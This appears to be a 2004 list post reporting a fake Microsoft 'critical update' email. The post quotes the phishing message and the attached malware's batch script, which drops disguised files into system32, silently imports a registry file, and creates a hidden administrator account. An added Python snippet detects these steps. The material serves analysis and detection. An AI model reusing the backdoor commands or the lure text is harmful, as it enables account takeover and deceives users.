I've just received a fake Microsoft email with a 744 KB patch attached.
It was not detected by my Norton, not by F-Prot, nor AVG or McAfee.

In this patch it has a start batch file which does this:

@echo off
copy _sys1.cab %windir%\system32\raddrv.dll
cls
copy _user1.cab %windir%\system32\admdll.dll
cls
copy data1.cab %windir%\system32\cmdll32.exe
cls
copy layout.bin %windir%\system32\settings.reg
cls
copy MSCOMCTL.OCX %windir%\system32\MSCOMCTL.OCX
cls
regedit.exe /s %windir%\system32\settings.reg
net user system_support {u-r-fucked} /ADD /ACTIVE:YES /EXPIRES:NEVER /TIMES:ALL
net localgroup "Administrators" "system_support" /ADD
cls
UPDATE.EXE
cls
exit

I've attached the email without the virus so you can have a look at it.

Adrian
--- Begin Message ---

Critical announcements

An important security announcement to all Microsoft Windows users!


Critical Security Update for Microsoft Windows (KB2856093)
 

A critical security issue has been identified that could allow an attacker to compromise a computer running Windows and gain control over your system and files. This issue has been discussed in KB2856093 Microsoft Knowledge Base. Microsoft Security Response Team recommends to protect your computer by installing this update from Microsoft.
 

Patch Information:

Type:  Critical Security Update
Vulnerability:  High
Vendor notified:  April 29, 2004
Update Release Date:  May 02, 2004
Download Size:  744 KB, < 2 minutes @ 28.8 modem
File Name:  WINDOWS-KB2856093-X86-ENU.EXE
Affected Versions:  Microsoft Windows 95/98/ME/NT/2000/XP/2003

To install this update, follow these instructions:

1 Download WINDOWS-KB2856093-X86-ENU.EXE file from Windows Update site or open an attached file.
 
2 Launch WINDOWS-KB2856093-X86-ENU.EXE and follow on-screen instructions.
 
3 After you install this item, you may have to restart your computer, to ensure a full protection.
 

 ©2004 Microsoft Corporation. All rights reserved. Terms of Use | Privacy Statement


--- End Message ---
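
As an added example (not part of the original post or of any tool mentioned in it), the following static triage flags the behaviours visible in the batch file above: payloads copied into system32 under a different extension, a silent registry import, a new local account, and its addition to Administrators. The rule names and function names are assumptions made for this sketch; the sample is the posted script with the `cls` lines omitted and the password replaced by a placeholder.

```python
import re

# Batch file from the post (cls lines omitted, password replaced by a placeholder).
# The mail-wrapped "/TIMES:ALL" line is kept to exercise continuation handling.
SAMPLE = r"""@echo off
copy _sys1.cab %windir%\system32\raddrv.dll
copy _user1.cab %windir%\system32\admdll.dll
copy data1.cab %windir%\system32\cmdll32.exe
copy layout.bin %windir%\system32\settings.reg
copy MSCOMCTL.OCX %windir%\system32\MSCOMCTL.OCX
regedit.exe /s %windir%\system32\settings.reg
net user system_support PASSWORD_REDACTED /ADD /ACTIVE:YES /EXPIRES:NEVER
/TIMES:ALL
net localgroup "Administrators" "system_support" /ADD
UPDATE.EXE
exit
"""

def logical_lines(text):
    """Re-join lines that a mail client wrapped in the middle of a command."""
    out = []
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("/") and out:  # a bare switch continues the previous command
            out[-1] += " " + line
        elif line:
            out.append(line)
    return out

def ext(path):
    return path.rsplit(".", 1)[-1].lower() if "." in path else ""

def triage(text):
    """Return (rule, detail) findings for installer-script behaviour worth an alert."""
    findings = []
    for line in logical_lines(text):
        low = line.lower()
        m = re.match(r'copy\s+(\S+)\s+(%windir%\\system32\\\S+)$', line, re.I)
        if m and ext(m.group(1)) != ext(m.group(2)):  # e.g. .cab dropped as .dll/.exe
            findings.append(("renamed-copy-to-system32", m.group(2)))
        elif re.match(r'regedit(\.exe)?\s+/s\s', low):
            findings.append(("silent-registry-import", line.split()[-1]))
        elif re.match(r'net\s+user\s+\S+.*\s/add\b', low):
            findings.append(("local-account-created", line.split()[2]))
        elif re.match(r'net\s+localgroup\s+"?administrators"?\s.*/add\b', low):
            findings.append(("added-to-administrators", line.split()[3].strip('"')))
    return findings
```

The same file names and the `system_support` account are what to look for on a host where the attachment was run.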
